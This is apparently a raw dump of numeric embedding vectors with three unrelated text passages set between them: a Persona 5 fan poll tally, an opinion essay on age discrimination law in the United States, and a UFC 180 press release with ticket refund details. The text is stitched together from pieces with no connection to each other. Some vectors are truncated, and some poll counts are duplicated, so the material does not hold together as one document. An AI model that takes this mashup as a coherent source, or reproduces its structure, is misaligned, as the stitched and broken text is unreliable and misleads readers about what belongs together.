-0.04990673437714577, 0.010935134254395962, -0.030475910753011703, -0.06460686773061752, -0.01594521664083004, -0.013525327667593956, -0.04464901611208916, 0.01245872862637043, 0.11779701709747314, 0.05347263813018799, 0.08458305895328522, -0.05403558537364006, 0.015810629352927208, -4.417548178008466e-33, 0.052996594458818436, -0.01737074926495552, 0.0758204385638237, 0.03768707811832428, -0.04013941064476967, -0.05326197296380997, -0.11290746182203293, 0.05944801867008209, 0.06858891248703003, 0.02758128196001053, -0.021163180470466614, 0.09231715649366379, 0.02309553325176239, -0.060138195753097534, -0.09981895238161087, -0.11123169213533401, 0.0006108838715590537, -0.02808757871389389, 0.024286815896630287, -0.12409038096666336, 0.08219010382890701, 0.0760531947016716, -0.04437137767672539, -0.031786300241947174, 0.10897787660360336, -0.02260046824812889, -0.044445160776376724, 0.04123932868242264, 0.03945762291550636, -0.052532609552145004, 0.03901786729693413, 0.07004547864198685, 0.034249454736709595, 0.0050732106901705265, 0.006052419077605009, 0.005122818052768707, 0.05732172727584839, 0.05806485190987587, 0.0025279903784394264, -0.05398856848478317, 0.05023602396249771, -0.06216628476977348, 0.0019155379850417376, -0.09301977604627609, -0.0006098956800997257, 0.0025290700141340494, 0.10279352217912674, 0.0024216780439019203, -0.029704291373491287, 0.015574494376778603, -0.06078888475894928, -0.037030916661024094, -0.030798958614468575, 0.04728451743721962, 0.03199756145477295, -0.006812276318669319, -0.001981449546292424, -0.023189188912510872, 0.03898407146334648, 0.044112678617239, 0.007222816348075867, 0.023715771734714508, 0.012379837222397327, 0.008762995712459087, 0.0032348064705729485, -0.039790231734514236, 0.011155864223837852, -0.0395711287856102, 0.024896740913391113, 0.10650210827589035, -0.09687015414237976, -0.06427952647209167, -0.005545330699533224, -0.057655513286590576, 0.09642835706472397, 0.015015074983239174, 0.007199164945632219, -0.13307644426822662, -0.07576441764831543, 0.01244684960693121, 0.07058510929346085, -0.026591511443257332, -0.06344589591026306, 0.007497766520828009, 0.10634507983922958, -0.07933684438467026, 0.014538869261741638, 0.0014750753762200475, -0.031966738402843475, 0.14547325670719147, -0.01615334488451481, -0.007238598540425301, 0.008905967697501183, -0.06737647205591202, 0.03928029164671898, -6.019731557671548e-8, 0.020330997183918953, -0.02437351830303669, -0.03394090384244919, -0.02458491548895836, 0.06637945026159286, 0.007409506011754274, 0.05497276782989502, -0.03328045830130577, -0.06492883712053299, 0.02302144654095173, 0.003578266128897667, -0.02040533535182476, -0.02106880396604538, 0.014342067763209343, 0.005828287918120623, -0.0408782958984375, 0.07731562107801437, -0.02599623054265976, 0.009121530689299107, -0.06281178444623947, 0.12125436216592789, 0.028891660273075104, 0.011353285051882267, -0.05097422003746033, 0.022929199039936066, -0.021883193403482437, -0.022932618856430054, 0.04082613065838814, -0.10111929476261139, 0.0017407848499715328, -0.040756210684776306, -0.0036715769674628973, -0.0341736301779747, 0.037098705768585205, -0.06931304931640625, -0.028135428205132484, -0.01730600744485855, 0.07931256294250488, 0.0819682702422142, -0.006225793622434139, 0.04493744671344757, 0.010946579277515411, 0.010319279506802559, 0.025400321930646896, 0.010389294475317001, -0.013984262011945248, 0.0512312650680542, 0.04507436230778694, -0.005116390995681286, 0.03764732927083969, -0.028260566294193268, -0.040136076509952545, 0.02446458674967289, -0.0022670726757496595, 0.00779265072196722, 0.004884564317762852, 0.03277277201414108, -0.011061864905059338, -0.021221604198217392, -0.008353444747626781, 0.07606641948223114, -0.03577320650219917, -0.07926952093839645, -0.04033984616398811 ]
The 352-page Persona 5 Maniax user handbook was released in Japan today, revealing the poll results for a Persona 5 related survey conducted from May 16 to May 26, 2017. There was a total of more than 1,800 respondents. 51% were female, 49% were male. 20% of respondents were between 10 and 20 years old, 56% were in their 20s, 20% were in their 30s, 3.5% were in their 40s, and 0.5% were in their 50s. [SPOILER WARNING] INFORMATION BELOW INCLUDES SPOILERS FOR PERSONA 5, READ AT YOUR OWN DISCRETION. How many times have you played through “Persona 5”? Cleared the Game 1 Time: 346 votes 346 votes Started a 2nd Playthrough: 511 votes 511 votes Cleared the Game 2 Times: 137 votes 137 votes Started a 3rd Playthrough: 342 votes 342 votes Cleared the Game 3 Times: 72 votes 72 votes Started a 4th Playthrough: 89 votes 89 votes Cleared the Game 4 Times: 33 votes 33 votes Started a 5th Playthrough: 43 votes 43 votes Cleared the Game 5 Times: 11 votes 11 votes Started a 6th Playthrough: 8 votes 8 votes Cleared the Game 6 Times: 2 votes 2 votes Started a 7th Playthrough: 7 votes 7 votes Started a 8th Playthrough: 1 vote 1 vote Cleared the Game 8 Times: 2 votes 2 votes Started a 9th Playthrough: 1 vote 1 vote Cleared the Game 9 Times: 1 votes 1 votes Started a 10th Playthrough: 4 vote 4 vote Cleared the Game 10 Times: 1 vote 1 vote Started a 12th Playthrough: 1 vote 1 vote Started a 13th Playthrough: 1 vote 1 vote Started a 15th Playthrough: 1 vote Who is your favorite character among the Phantom Thieves? Protagonist (691 votes) Makoto Niijima (346 votes) Yusuke Kitagawa (244 votes) Futaba Sakura (213 votes) Morgana (135 votes) Haru Okumura (117 votes) Ann Takamaki (70 votes) Ryuji Sakamoto (64 votes) Who is your favorite Confidant character? Goro Akechi (350 votes) Tae Takemi (343 votes) Sojiro Sakura (279 votes) Sadayo Kawakami (184 votes) Toranosuke Yoshida (179 votes) Hifumi Togo (150 votes) Munehisa Iwai (81 votes) Sae Niijima (59 votes) Yuuki Mishima (55 votes) Chihaya Mifune (43 votes) Igor (35 votes) Shinya Oda (33 votes) Caroline (31 votes) Justine (27 votes) Ichiko Ohya (2 votes) Who is your favorite character, excluding the above categories? Lala Escargot (159 votes) Lavenza (158 votes) Shiho Suzui (146 votes) Masayoshi Shido (80 votes) Newspaper Club Member (79 votes) Suguru Kamoshida (64 votes) Mr. Hiruta (54 votes) Young Rocker (24 votes) Mika (18 votes) Old Man at the Bathhouse (17 votes) President Tanaka (17 votes) Junya Kaneshiro (16 votes) Ichiryusai Madarame (16 votes) Real Igor (15 votes) Scruffy Romantic & Beefy Trendsetter (14 votes) What is your favorite persona among the Phantom Thieves’ dedicated personas? Arsene (765 votes) Johanna (369 votes) Goemon (119 votes) Carmen (94 votes) Milady (89 votes) Captain Kidd (71 votes) Necronomicon (55 votes) Zorro (51 votes) Anat (36 votes) Satanael (32 votes) Kamu Susano-o (17 votes) Seiten Taisei (16 votes) Astarte (15 votes) Hecate (13 votes) Prometheus (11 votes) Mercurius (7 votes) What is your favorite persona among other personas? Yoshitsune (186 votes) Alice (136 votes) Jack Frost (123 votes) Loki (109 votes) Mara (81 votes) Black Frost (48 votes) Seth (36 votes) Neko Shogun (36 votes) Trumpeter (29 votes) King Frost (26 votes) Thanatos (26 votes) Shiki-Ouji (22 votes) Cu Chulainn (19 votes) Scathach (18 votes) Mothman (18 votes) What is your favorite scene? Bargaining with Akechi (138 votes) The Protagonist’s fake death plan (125 votes) Igor’s release (84 votes) Summoning Satanael (84 votes) Futaba’s awakening (82 votes) Makoto’s awakening (71 votes) Yusuke’s awakening (53 votes) Phantom Thieve’s final calling card (52 votes) Phan-site support reaches 100% (38 votes) The opening act of infiltrating Niijima’s palace (32 votes) The protagonist’s awakening (31 votes) Freeing the protagonist after his arrest. (29 votes) Akechi eating the special takoyaki during the school festival. (28 votes) The good ending. (22 votes) The escape from Shido’s collapsing palace. (19 votes) The school trip. (18 votes) Sojiro finding out about the Phantom Thieves. (17 votes) Yusuke’s Confidant link from 4 to 5. (16 votes) Product Details
[ 0.028177939355373383, -0.002911097602918744, 0.06401003152132034, -0.047839969396591187, 0.009722087532281876, 0.06760487705469131, 0.01920202560722828, 0.031134122982621193, -0.026707598939538002, 0.12847837805747986, 0.020062826573848724, -0.016014620661735535, -0.017090672627091408, -0.023750731721520424, 0.05251821503043175, 0.004600379150360823, 0.05861836299300194, -0.008883940987288952, -0.0009058403084054589, 0.015016872435808182, 0.04948153346776962, -0.15139058232307434, 0.035085465759038925, -0.03882730379700661, 0.020945237949490547, -0.010941612534224987, 0.016285162419080734, -0.01202043704688549, -0.10240539908409119, -0.0698498860001564, -0.030166419222950935, 0.12716099619865417, 0.03411371633410454, -0.05345241352915764, -0.07562193274497986, -0.009614921174943447, 0.02485037036240101, 0.01930195838212967, -0.042854372411966324, 0.03609016165137291, -0.061248667538166046, -0.07351849228143692, -0.035225849598646164, 0.03049706481397152, 0.019483692944049835, -0.05649706348776817, -0.1398434191942215, -0.025025684386491776, -0.00462298421189189, 0.02794433757662773, -0.09661224484443665, 0.0156538262963295, 0.11342970281839371, 0.0032185097225010395, 0.061627864837646484, -0.03230840712785721, 0.027137281373143196, 0.010333945043385029, 0.055567752569913864, 0.03687751293182373, -0.045703645795583725, -0.004445014055818319, -0.0528736412525177, -0.02908840961754322, -0.020848872140049934, 0.03957774117588997, -0.03443537652492523, -0.08298739045858383, 0.031113209202885628, 0.045517176389694214, -0.0365922749042511, 0.010053610429167747, 0.08558059483766556, -0.03614812716841698, -0.055222585797309875, 0.022378718480467796, -0.02344840206205845, -0.0660000592470169, -0.030651550740003586, -0.018543323501944542, -0.009630190208554268, 0.055448032915592194, 0.011823367327451706, -0.037135083228349686, 0.0028396088164299726, -0.005717705935239792, 0.022581690922379494, 0.00667843921110034, -0.07375475019216537, 0.003226645989343524, -0.07788519561290741, 0.12139418721199036, 0.03482464328408241, 0.02613062784075737, 0.05080137401819229, 0.013621731661260128, -0.07180220633745193, -0.02729557640850544, -0.0038827271200716496, -0.0062370290979743, -0.015952466055750847, 0.031060881912708282, 0.006849448662251234, -0.015480074100196362, 0.011049812659621239, 0.02536367066204548, 0.04291995242238045, 0.0020645197946578264, -0.035984404385089874, 0.0074560269713401794, -0.059038594365119934, -0.03928625211119652, -0.016273193061351776, -0.012117202393710613, 0.0819125771522522, 0.00611502630636096, 0.004569089040160179, 0.09716124832630157, 0.0643094852566719, 0.09671913832426071, 0.1364041268825531, 0.06109664589166641, 0.031766489148139954, 0.02144024707376957, 0.02879858762025833, 0.04645218327641487, -0.01878277026116848, 1.0449739967943072e-32, -0.00413901312276721, 0.00855138897895813, -0.03429018333554268, 0.15205803513526917, -0.06670282781124115, 0.04900899529457092, 0.012359673157334328, 0.008002964779734612, -0.08155755698680878, -0.0029795023147016764, -0.005263126455247402, -0.027048515155911446, -0.04072081670165062, 0.003746771952137351, 0.07757314294576645, 0.04426220431923866, -0.025373157113790512, 0.039056867361068726, -0.047069065272808075, 0.0550517737865448, 0.07316184788942337, -0.03987477719783783, -0.029287001118063927, -0.02704065665602684, 0.02503397688269615, 0.13598431646823883, -0.01959988847374916, -0.04823850095272064, 0.03520304709672928, 0.01720750518143177, -0.032337356358766556, -0.017681607976555824, -0.004695481155067682, 0.02764703333377838, 0.010491439141333103, 0.033726707100868225, 0.04312239959836006, 0.03923867642879486, -0.017056675627827644, 0.013230218552052975, -0.014543741941452026, -0.03721075877547264, -0.04510235786437988, 0.03295915573835373, -0.10393992811441422, -0.06792445480823517, 0.02045036293566227, -0.07720734179019928, -0.006097961682826281, 0.061053842306137085, -0.08458902686834335, 0.02716670371592045, 0.04355526342988014, 0.060908492654561996, 0.009215220808982849, -0.01938052847981453, -0.014306318946182728, -0.05437227711081505, -0.1026419848203659, 0.028922289609909058, 0.05381416529417038, 0.010663018561899662, -0.022658957168459892, -0.0628865510225296, -0.02983720228075981, 0.06182170286774635, 0.03253931552171707, -0.0658898577094078, 0.033632662147283554, 0.019043292850255966, 0.023725571110844612, 0.041155051440000534, -0.0177585668861866, 0.07911023497581482, -0.035175710916519165, -0.046817846596241, 0.04495822265744209, -0.005152031313627958, -0.05517002195119858, 0.05703376233577728, 0.008890368975698948, -0.0305770393460989, -0.05270494520664215, -0.020931296050548553, 0.024959761649370193, 0.03694799169898033, 0.10530619323253632, -0.034438926726579666, -0.07847531884908676, 0.008986838161945343, 0.05622054263949394, -0.1451592892408371, 0.042012643069028854, 0.016555869951844215, -0.0986320823431015, -1.0378040690014666e-32, -0.04474901407957077, -0.004702989012002945, -0.007183333858847618, 0.015462429262697697, 0.007405346725136042, -0.06239543855190277, 0.04919595643877983, 0.07846023142337799, -0.013721087016165257, -0.006504550576210022, -0.01664307713508606, 0.013175192289054394, 0.05065560340881348, 0.03112969547510147, 0.04408477246761322, 0.012582778930664062, 0.001902611693367362, -0.05376454442739487, 0.013744812458753586, 0.025417888537049294, 0.0790521502494812, -0.005845853127539158, -0.045495644211769104, 0.0394660048186779, 0.046552397310733795, 0.09378281980752945, 0.10373010486364365, -0.09803872555494308, -0.013659297488629818, -0.03543267399072647, 0.009578373283147812, 0.02071255072951317, -0.031986769288778305, -0.06114761158823967, 0.06306182593107224, -0.01766183041036129, -0.12329049408435822, 0.02826976776123047, 0.0011146330507472157, 0.0229030791670084, -0.055727388709783554, 0.017009731382131577, -0.06269263476133347, -0.013874957337975502, -0.10214675217866898, 0.022450195625424385, 0.037386901676654816, 0.011210971511900425, 0.04602685570716858, -0.01065775752067566, -0.023302609100937843, 0.009766949340701103, -0.0563664510846138, -0.05887967720627785, -0.07670100033283234, -0.13063138723373413, -0.0018445722525939345, -0.020987851545214653, 0.025979354977607727, 0.036453161388635635, 0.03410887345671654, 0.062275324016809464, 0.002058188896626234, 0.0120243476703763, 0.01108032837510109, 0.045002005994319916, 0.03930126130580902, -0.05361807346343994, -0.11989320814609528, -0.01615288108587265, -0.05608425661921501, -0.0341358408331871, -0.041547778993844986, 0.045916520059108734, -0.003279928583651781, -0.011046540923416615, -0.0729309543967247, 0.0802086740732193, 0.04814210534095764, -0.028345583006739616, -0.07434111088514328, 0.012691503390669823, -0.05341119319200516, -0.02689148671925068, -0.008194413036108017, -0.016618026420474052, 0.0015546531649306417, 0.005737198516726494, -0.0021814831998199224, 0.10151533037424088, 0.028094694018363953, 0.04757259413599968, -0.07654120773077011, -0.03381712734699249, -0.07632748037576675, -6.307984534714706e-8, 0.07271265238523483, 0.024161234498023987, 0.027663646265864372, -0.03871392458677292, 0.05616609379649162, 0.09522800892591476, -0.03766204044222832, -0.00836966373026371, 0.09583338350057602, 0.029679013416171074, 0.05930933728814125, 0.012504523620009422, 0.028584768995642662, 0.0042083668522536755, 0.0957266092300415, -0.06514965742826462, -0.009515332989394665, 0.019220829010009766, -0.011791717261075974, 0.0008120762649923563, 0.03715125098824501, -0.014667156152427197, -0.030187975615262985, -0.13588599860668182, -0.036545250564813614, 0.03264907747507095, 0.005799143575131893, -0.008213231340050697, -0.09596826136112213, -0.04474311321973801, 0.03616975247859955, 0.015309649519622326, -0.06234360486268997, -0.031810544431209564, 0.03790511190891266, 0.1351124346256256, -0.044704537838697433, 0.010189734399318695, -0.06969371438026428, 0.015315047465264797, 0.02257716841995716, -0.07978629320859909, -0.013730939477682114, 0.05185724422335625, -0.009762365370988846, -0.04878556355834007, -0.07215693593025208, -0.08033347874879837, 0.05818862468004227, -0.0781996101140976, -0.09209272265434265, 0.012834417633712292, -0.03895841911435127, 0.0022184927947819233, 0.04512544348835945, 0.04897426813840866, 0.0541314072906971, 0.009226445108652115, 0.018373025581240654, -0.031785063445568085, -0.013910426758229733, -0.03251909092068672, -0.0934503898024559, -0.003920219838619232 ]
President Lyndon Johnson’s labor secretary, Willard Wirtz, reported that there was substantial discrimination against older workers and that the nation was needlessly denying older people “opportunity for that useful activity which constitutes much of life’s meaning.” Bolstered by Wirtz’s report, in 1967 Congress passed the Age Discrimination in Employment Act. It used parallel language to the 1964 act, which should have guaranteed older Americans comparable rights to other groups. It has not worked out that way. The courts have repeatedly thrown up barriers to age discrimination suits, long before the Supreme Court’s June decision. In 1993, in one of its most damaging rulings, the court decided that if employers fire workers whose pension costs or salaries are high, they are not discriminating — even if the overwhelming number of people fired are older workers. Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt-out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters. There are several possible reasons that age discrimination is not taken as seriously as other biases. Older workers are generally not victims of animosity, but rather of unfair stereotypes — that they work more slowly or do not adapt well to change. Many people also seem to agree with the appeals court in the light bulb case: that unlike racism, which is inherently wrong, there is something natural about the old making way for the young. Never mind that with the Social Security retirement age rising, and pensions disappearing, many older Americans have no choice but to work. As flawed as the Age Discrimination in Employment Act is, older people have fared even worse in constitutional law. The Supreme Court in 1976 rejected an equal protection challenge to Massachusetts’s mandatory retirement age of 50 for state police officers. The sole dissenter was Justice Thurgood Marshall, who had been a legendary litigator for the NAACP Legal Defense and Educational Fund. Older people, Justice Marshall said, are not in the same category as blacks when it comes to discrimination. They are not “isolated in society,” he noted, and there are even laws according them special benefits. Nevertheless, he said, older people are “undoubtedly discriminated against,” and when a law “denies them an important benefit” — employment — there must be a better reason for it than Massachusetts was able to offer. Justice Marshall was right. To be rejected on account of old age may or may not feel the same as being rejected on the basis of race or sex. But it is clearly unjust and dehumanizing, and the law should take it more seriously than it does.
[ -0.043431684374809265, 0.06843039393424988, -0.025723295286297798, 0.04262196272611618, 0.04569195210933685, 0.12926729023456573, -0.022525928914546967, -0.056870218366384506, -0.12367923557758331, 0.027995506301522255, 0.012991857714951038, 0.10909364372491837, -0.010379749350249767, 0.03677315637469292, 0.01816602237522602, 0.05991426855325699, 0.020859001204371452, 0.08499415963888168, -0.044089604169130325, -0.06698884069919586, 0.04726682975888252, 0.023183738812804222, -0.04211566597223282, -0.042039647698402405, -0.023222289979457855, -0.06837257742881775, -0.06361669301986694, -0.0430019237101078, 0.013667269609868526, 0.0585661455988884, 0.02957446686923504, 0.004129577428102493, 0.0428876094520092, 0.04985921084880829, 0.0041166334412992, -0.09493811428546906, 0.03541112691164017, 0.04307854175567627, -0.0054572513327002525, -0.006444536615163088, -0.016029514372348785, -0.0837632566690445, -0.07097410410642624, -0.03261096030473709, -0.05544860661029816, -0.0070421709679067135, 0.03297629952430725, -0.05865054577589035, -0.07960428297519684, 0.03071117028594017, -0.007905010133981705, -0.04288138821721077, 0.038482166826725006, 0.04032246395945549, -0.025530217215418816, -0.04444798827171326, -0.062558613717556, 0.016106128692626953, -0.0036425006110221148, 0.003859214950352907, -0.05489128455519676, -0.1209135428071022, 0.019341053441166878, 0.004222994204610586, -0.07079216092824936, -0.12003473937511444, 0.02582770586013794, -0.05060386657714844, -0.03131779283285141, -0.019162679091095924, -0.020144177600741386, 0.0676838830113411, -0.0351267047226429, 0.07979746162891388, 0.033202480524778366, -0.017563361674547195, 0.027758223935961723, 0.011826778762042522, -0.006457511335611343, -0.1277817189693451, 0.0059996419586241245, -0.08014187216758728, -0.06797835975885391, 0.05130448937416077, 0.039872415363788605, -0.0440664142370224, -0.05212176963686943, 0.00009387148020323366, 0.04813277721405029, -0.05109915882349014, 0.08216165751218796, -0.022349318489432335, -0.03409606218338013, -0.03447486087679863, 0.08286740630865097, -0.12195239216089249, 0.009441233240067959, 0.07360616326332092, -0.021587977185845375, 0.044878579676151276, -0.05538284033536911, -0.033710893243551254, 0.003141732420772314, 0.010389869101345539, -0.01294180192053318, -0.0561218336224556, -0.01653398759663105, 0.03152123838663101, -0.06328251957893372, -0.003178464947268367, -0.013834435492753983, -0.022075332701206207, 0.025230607017874718, 0.011950463987886906, -0.010180512443184853, -0.03276726230978966, -0.008884845301508904, 0.0302775539457798, -0.016026156023144722, 0.029334187507629395, 0.028347043320536613, 0.10286293178796768, -0.11605750769376755, 0.06249701976776123, -0.0741880014538765, 0.016324764117598534, 0.026218701153993607, 2.184906043552771e-33, 0.07861963659524918, -0.010895881801843643, -0.07787394523620605, 0.008038748987019062, 0.05801447108387947, -0.041118428111076355, 0.006009862758219242, -0.05868993699550629, 0.013709712773561478, 0.06675714999437332, -0.04314374178647995, 0.04115346074104309, 0.017476461827754974, -0.08883120864629745, -0.03821450471878052, 0.07758262008428574, -0.10780118405818939, 0.05298633128404617, 0.018108254298567772, 0.06809618324041367, 0.0883166715502739, 0.031665459275245667, -0.08884665369987488, 0.03973072022199631, -0.0817175805568695, -0.04520667344331741, -0.00906041357666254, -0.0020366061944514513, -0.007154214195907116, -0.00638167466968298, -0.010088540613651276, 0.004140789620578289, 0.04684982821345329, 0.015237714163959026, 0.03656010329723358, -0.008149979636073112, -0.01967301405966282, 0.03886044770479202, -0.04037386178970337, -0.06858174502849579, -0.044628456234931946, 0.0003329299797769636, 0.08228744566440582, -0.01214680541306734, 0.016763849183917046, -0.0032556939404457808, 0.050041645765304565, -0.04286768659949303, -0.003298712894320488, 0.06822209060192108, 0.06254710257053375, 0.015682963654398918, 0.029611412435770035, -0.0027157366275787354, -0.03865969181060791, -0.03037259913980961, -0.05222600698471069, 0.06131250411272049, 0.06009862571954727, -0.0008860197267495096, -0.032760024070739746, 0.021647082641720772, 0.014748889952898026, 0.011510426178574562, -0.031311314553022385, -0.004802195355296135, -0.03803952410817146, -0.023619364947080612, -0.015521390363574028, 0.07924959808588028, 0.07185551524162292, 0.056955620646476746, -0.04379433020949364, -0.028050562366843224, -0.012425069697201252, 0.02528046816587448, 0.04190517216920853, 0.007171538658440113, 0.030263157561421394, -0.13204608857631683, 0.08306531608104706, -0.04089871048927307, 0.02585567720234394, -0.009638886898756027, 0.05070900917053223, -0.009272578172385693, -0.048517338931560516, -0.023341627791523933, 0.05494284629821777, 0.06555711477994919, -0.00119875930249691, -0.09321661293506622, 0.031621888279914856, 0.045910559594631195, 0.05421099439263344, -4.481597559106911e-33, -0.11790825426578522, -0.00802656915038824, -0.019169051200151443, 0.0613221749663353, 0.013027943670749664, 0.005453664809465408, -0.025614775717258453, -0.0587916374206543, 0.00576185854151845, -0.02850393019616604, 0.057698532938957214, -0.039750516414642334, 0.024100294336676598, 0.11875762045383453, -0.06903598457574844, -0.002997700357809663, 0.03971237689256668, 0.026904869824647903, -0.05669688060879707, 0.0046021160669624805, 0.014559008181095123, 0.07592960447072983, -0.0630212277173996, 0.08580613881349564, -0.005190583877265453, 0.033530060201883316, 0.004882591776549816, -0.06889864057302475, 0.0060370792634785175, 0.049997564405202866, -0.1088290587067604, 0.007188780698925257, -0.036362603306770325, 0.05561796575784683, 0.041610877960920334, -0.1295267641544342, -0.013467040844261646, -0.02909678779542446, 0.04638950526714325, -0.05721450224518776, 0.0420437715947628, -0.05011993646621704, -0.004730195738375187, -0.002818048233166337, 0.05590927228331566, -0.037076134234666824, 0.03946676105260849, -0.10248924791812897, -0.010118230246007442, -0.04444330558180809, -0.03690415248274803, 0.034571003168821335, 0.02995021641254425, 0.0675116628408432, -0.023932358250021935, -0.07911030203104019, -0.009114973247051239, -0.06824477761983871, -0.000821658584754914, 0.06942683458328247, 0.05492786318063736, 0.0003258207580074668, -0.0361715629696846, 0.019071660935878754, 0.017426399514079094, -0.026919635012745857, 0.00014423942775465548, 0.009359079413115978, 0.03479013592004776, 0.031383439898490906, 0.07674264907836914, -0.0792117565870285, -0.02799440175294876, -0.008327201008796692, 0.034211043268442154, -0.047255925834178925, 0.10314357280731201, 0.09586813300848007, -0.18872396647930145, 0.10821975022554398, 0.06252437829971313, -0.03076176904141903, 0.005881509277969599, 0.011720222420990467, 0.021333487704396248, 0.09960390627384186, -0.03302545100450516, 0.005049979779869318, -0.023231057450175285, -0.008192500099539757, -0.039337579160928726, -0.07467546314001083, -0.05075415223836899, 0.02388518862426281, -0.0859256312251091, -5.603588704161666e-8, 0.003616632893681526, 0.002091578906401992, -0.062080688774585724, 0.02597184292972088, -0.061302199959754944, -0.06450428068637848, -0.01755393110215664, -0.04788639396429062, 0.0074645658023655415, 0.03827546909451485, 0.06842394173145294, 0.015025123953819275, 0.11101001501083374, -0.04371058940887451, 0.0732000544667244, 0.034031469374895096, -0.016847169026732445, -0.0193424541503191, 0.01638083904981613, 0.03353716805577278, 0.05615829676389694, -0.015982341021299362, -0.004857124760746956, 0.05142330005764961, -0.019501522183418274, 0.04652150347828865, 0.014036566019058228, 0.03765606880187988, 0.035108767449855804, -0.0026223910972476006, -0.05419032648205757, 0.09932693839073181, -0.06760737299919128, -0.04021622985601425, 0.0014331154525279999, -0.012725929729640484, 0.03579241782426834, -0.002035378245636821, -0.030554216355085373, -0.0204470232129097, -0.02190750651061535, 0.06472482532262802, -0.01110567431896925, 0.003905625082552433, 0.08392792195081711, 0.003637985559180379, -0.03607727214694023, 0.017408201470971107, -0.04334848374128342, 0.043274056166410446, 0.038674551993608475, 0.02979898452758789, 0.091181181371212, 0.006865066941827536, 0.04707920923829079, -0.01693820208311081, 0.025029759854078293, -0.024257177487015724, -0.09385368227958679, -0.07008453458547592, 0.1072082594037056, -0.03730335459113121, 0.042917754501104355, 0.01960936188697815 ]
Mexico City, Mexico - The UFC® announced today that UFC heavyweight champion Cain Velasquez suffered a right knee injury during training and was forced to withdraw from his championship fight against No.1 contender Fabricio Werdum in Mexico City on November 15. As a result, No.4 heavyweight Mark Hunt (10-8-1 in professional MMA, fighting out of Auckland, New Zealand), who is coming off a walk-away knockout against the iron-chinned Roy Nelson in Tokyo in September (https://www.youtube.com/watch?v=PGunUlEd50A), will face Werdum (18-5-1, fighting out of Los Angeles via Porto Alegre, Brazil) in the five-round main event for the interim UFC heavyweight title. “I’m so unbelievably disappointed that this happened,” Velasquez said. “To say I was looking forward to fighting in Mexico for the first time is an understatement. I wanted to fight on that card so bad. Looks like it wasn’t meant to be and it’s not going to happen. I’m going to get my [right] knee fixed and get back to training as soon as I can. I’m sorry to the fans in Mexico who were expecting this fight, and I hope to be able to come down and still be a part of this historic event.” For Werdum, it was never about Cain, it was always about the title. “I’m ready for whatever comes. I have been training in Mexico for nearly two months and accept the challenge that is presented to me. I'll continue to prepare and will arrive ready to fight on behalf of all my Latin American fans," said Werdum. Mark Hunt, never one to shy away from a big opportunity, wasted no time accepting a dream opportunity to fight for UFC gold. “I feel blessed to have this opportunity to fight for another world title. This is something that doesn’t happen often to people. First K1 and now UFC – how can I say no, even though it’s on short notice? I’m dropping everything and flying to Mexico tomorrow so I can best prepare myself for this fight. I have to get into shape and acclimatize to that environment, which is really important. “There’s nothing to lose when you’re competing against the best at the top level,” Hunt added. UFC 180: WERDUM vs. HUNT scheduled for November 15 at the Arena Mexico City, sold-out in only eight hours, and will welcome more than 20,000 fans. Along with the explosive main event, fans will also be treated to six other bouts featuring Latin American contenders. For more information visit www.ufcnetwork.com. All bouts are live and subject to change. UFC ticket refund policy Due to causes beyond our company's control, there has been a change in the main event of UFC 180 and Cain Velasquez will no longer be participating. For customers who wish to request a refund the times to do so will be from October 28th to November 7th 2014, from 10:00 a.m. to 8:00 p.m. CT. For purchases made with a credit card and/or debit card, please go to the box office of Arena Ciudad de Mexico with the following documents: * Card with which the purchase was made. Original and copy * Official identification. Original and Copy * Tickets. Purchases in CASH, OXXO, ELEKTRA, PALACIO DE HIERRO's CARD through Superboletos reimbursements will be made at the Arena Ciudad de Mexico box office only from October 28 to November 7, 2014, please submit: * Tickets. * Official identification. Original and Copy Foreign clients For customers who are foreign refund dynamic is as follows, you must send your scanned tickets to the following e-mail address: [email protected] with the title "UFC refund", submitting the following: * Tickets * Official identification. Copy * Card with the purchase I make (if applicable, Copy) Once the documents are sent, the actual tickets must be mailed to our offices in Monterrey, which will provide a reply to the e-mail in which we receive the documents. The dates for this are from October 28th to November 7th, 2014. If you purchased with cash you must also attach the card to which you want us to make the deposit, if the purchase was made through credit/debit card the refund should appear on your balance from 25 to 30 working days from when the complete paperwork is received. Service charge is not refundable. ### About the Ultimate Fighting Championship® Owned and operated by Zuffa, LLC, the Ultimate Fighting Championship (UFC®) is the premier mixed martial arts (MMA) organization and largest pay-per-view event provider in the world. Headquartered in Las Vegas with offices in London, Toronto, Singapore and Sao Paulo, UFC produces more than 40 live events annually that consistently sell out some of the most prestigious arenas around the globe. UFC programming is broadcast in 129 countries and territories to nearly 800 million TV households worldwide in 28 different languages. The UFC has a multi-year broadcast agreement with FOX in the U.S., which annually includes four live events broadcast on the FOX network, as well as The Ultimate Fighter® reality television show and thousands of hours of programming on FOX Sports 1 and FOX Sports 2. In 2014, UFC launched UFC FIGHT PASS™, a digital subscription service with exclusive live events, thousands of fights on-demand and original content. The UFC organization also licenses over 100 UFC GYM® locations, and owns UFC.TV® (offering live event broadcasts and video on-demand around the world), UFC FIT® (an in-home fitness and nutrition program), UFC Magazine, and has a videogame franchise with EA SPORTS, UFC Fight Club®, UFC Fan Expo®, UFC branded apparel, DVDs and Blu-rays and Topps Trading Cards. For more information, visit UFC.com and follow UFC at Facebook.com/UFC, Twitter and Instagram: @UFC. Press contact for UFC: Mary Vincent +1-703-772-7407 [email protected] Isabelle McLemore +1-702-540-0905 [email protected]
[ -0.03368646651506424, 0.09067823737859726, -0.07650023698806763, 0.11250218003988266, 0.06702655553817749, 0.01175843644887209, -0.028044335544109344, 0.05148707702755928, -0.0024956355337053537, 0.014850867912173271, -0.031223801895976067, -0.040783852338790894, -0.032039616256952286, 0.08833415806293488, 0.018476203083992004, -0.0014544815057888627, -0.005571529269218445, 0.00018007175822276622, 0.023226680234074593, 0.06870954483747482, 0.003629615530371666, 0.051847245544195175, 0.014470345340669155, 0.015824206173419952, -0.01065490860491991, -0.04876486584544182, -0.038302287459373474, 0.01325607392936945, 0.020982127636671066, -0.07223404943943024, 0.01816103234887123, -0.02630520425736904, 0.036391887813806534, -0.02751138061285019, -0.09192918241024017, -0.0766637846827507, 0.06543201208114624, -0.016701946035027504, -0.04133296757936478, 0.005922379903495312, -0.05540282651782036, 0.04769525304436684, -0.06654934585094452, 0.01101013645529747, 0.051176805049180984, 0.007655507884919643, 0.01789453625679016, 0.08773697167634964, -0.012485682033002377, -0.019340017810463905, 0.054191704839468, -0.036436717957258224, 0.049905985593795776, 0.022597871720790863, -0.021824458613991737, 